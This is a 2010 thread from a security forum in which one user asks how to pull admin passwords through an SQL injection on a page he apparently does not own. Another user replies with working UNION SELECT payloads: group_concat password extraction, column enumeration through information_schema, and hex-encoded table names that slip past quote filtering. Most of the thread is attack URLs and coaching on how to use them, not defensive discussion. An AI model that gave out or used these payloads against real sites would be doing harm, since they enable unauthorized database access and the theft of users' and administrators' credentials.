 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 277
 Members: 0
 Total: 277
|
|
|
|
|
|
PacketStorm News |
|
| Currently there is a problem with headlines from this site |
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
sql injection help |
|
 Posted: Wed Sep 01, 2010 1:23 pm |
 |
|
| cMD |
| Advanced user |
 |
| |
| Joined: Sep 23, 2008 |
| Posts: 67 |
|
|
|
 |
|
 |
|
Hello i have problem!
I got sql injections page but i cant see data
if i do | Code: | | index.php?id=1+union+select+1,2,password,+from+users-- |
i can see passwords
but from admin table i can't see! |
|
|
|
|
| Posted: Thu Sep 02, 2010 9:13 pm |
|
|
| cMD |
| Advanced user |
|
| |
| Joined: Sep 23, 2008 |
| Posts: 67 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Sep 06, 2010 11:52 am |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| More information is needed ... |
|
|
|
|
| Posted: Wed Sep 15, 2010 6:00 pm |
|
|
| cMD |
| Advanced user |
|
| |
| Joined: Sep 23, 2008 |
| Posts: 67 |
|
|
|
|
|
|
|
| i can't see data from admin table from others tables i can! |
|
|
|
|
|
|
|
|
| Posted: Thu Sep 16, 2010 2:48 am |
|
|
| kaykay |
| Regular user |
|
| |
| Joined: Apr 27, 2010 |
| Posts: 8 |
| Location: The moon |
|
|
|
|
|
|
First thing first, there is an error in your syntax, there should be no "," at the end!
You'll get a alot more information if you use group_concat(password) like:
| Code: |
index.php?id=1+union+select+1,2,group_concat(password)+from+users--
|
And use LIMIT!
Are you sure there's even a "password" column in the admin table? It might be called something else. If it's MySQL 5.x use information_schema.columns to get a list of columns in the table.
| Code: |
from+information_schema.columns+where+table_name='xxxx'--
|
Where xxxx = the name of the table. Most times you will have to hex encode it and make sure to place 0x infront of the hex so it knows that it is hex! IIRC this has somthing to do with magic_quotes_gpc.
Like:
| Code: |
from+information_schema.columns+where+table_name=0x78787878--
|
And use group_concat(column_name) like this:
| Code: |
index.php?id=1+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name=0x78787878--
|
Presuming your vulnerable column is 3 |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
